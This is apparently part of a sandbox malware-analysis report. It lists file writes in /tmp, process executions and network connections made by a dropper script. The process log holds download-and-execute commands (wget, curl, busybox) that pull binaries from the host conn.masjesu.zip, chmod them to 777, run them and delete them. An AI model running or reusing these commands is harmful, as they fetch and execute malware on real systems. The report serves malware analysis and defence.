| File opened for modification | /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 | /usr/bin/curl | N/A |
Processes
/tmp/5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e.sh
[/tmp/5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]
/bin/chmod
[chmod 777 s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]
/tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E
[./s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]
/bin/rm
[rm s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]
/bin/chmod
[chmod 777 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]
/tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT
[./1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]
/bin/rm
[rm 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]
/bin/chmod
[chmod 777 MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]
/tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz
[./MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]
/bin/rm
[rm MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]
/bin/chmod
[chmod 777 ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]
/tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319
[./ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]
/bin/rm
[rm ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]
/bin/chmod
[chmod 777 Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]
/tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe
[./Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]
/bin/rm
[rm Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]
/bin/chmod
[chmod 777 rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]
/tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94
[./rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]
/bin/rm
[rm rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]
/bin/chmod
[chmod 777 vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]
/tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu
[./vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]
/bin/rm
[rm vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]
/bin/chmod
[chmod 777 t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]
/tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g
[./t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]
/bin/rm
[rm t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]
/bin/chmod
[chmod 777 X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]
/tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq
[./X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]
/bin/rm
[rm X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]
/bin/chmod
[chmod 777 sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]
/tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12
[./sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]
/bin/rm
[rm sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]
/bin/chmod
[chmod 777 hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]
/tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ
[./hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]
/bin/rm
[rm hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]
/bin/chmod
[chmod 777 3wDzYpBDBabysp43dimFTylVEdU479lZE3]
/tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3
[./3wDzYpBDBabysp43dimFTylVEdU479lZE3]
/bin/rm
[rm 3wDzYpBDBabysp43dimFTylVEdU479lZE3]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]
/bin/chmod
[chmod 777 OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]
/tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0
[./OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]
/bin/rm
[rm OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]
/bin/chmod
[chmod 777 tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]
/tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6
[./tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]
/bin/rm
[rm tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]
/bin/chmod
[chmod 777 X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]
/tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq
[./X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]
/bin/rm
[rm X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]
/bin/chmod
[chmod 777 rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]
/tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94
[./rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]
/bin/rm
[rm rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]
/bin/chmod
[chmod 777 vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]
/tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu
[./vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]
/bin/rm
[rm vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]
/bin/chmod
[chmod 777 t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]
/tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g
[./t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]
/bin/rm
[rm t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]
/bin/chmod
[chmod 777 sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]
/tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12
[./sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]
/bin/rm
[rm sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]
/bin/chmod
[chmod 777 hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]
/tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ
[./hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]
/bin/rm
[rm hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]
/bin/chmod
[chmod 777 3wDzYpBDBabysp43dimFTylVEdU479lZE3]
/tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3
[./3wDzYpBDBabysp43dimFTylVEdU479lZE3]
/bin/rm
[rm 3wDzYpBDBabysp43dimFTylVEdU479lZE3]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]
/bin/chmod
[chmod 777 OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]
/tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0
[./OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]
/bin/rm
[rm OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]
/bin/chmod
[chmod 777 tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]
/tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6
[./tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]
/bin/rm
[rm tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]
/bin/chmod
[chmod 777 Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]
/tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe
[./Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]
/bin/rm
[rm Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]
/bin/chmod
[chmod 777 s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]
/tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E
[./s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]
/bin/rm
[rm s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]
/bin/chmod
[chmod 777 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]
/tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT
[./1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]
/bin/rm
[rm 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]
/bin/chmod
[chmod 777 MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]
/tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz
[./MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]
/bin/rm
[rm MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]
/bin/chmod
[chmod 777 ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]
/tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319
[./ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]
/bin/rm
[rm ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
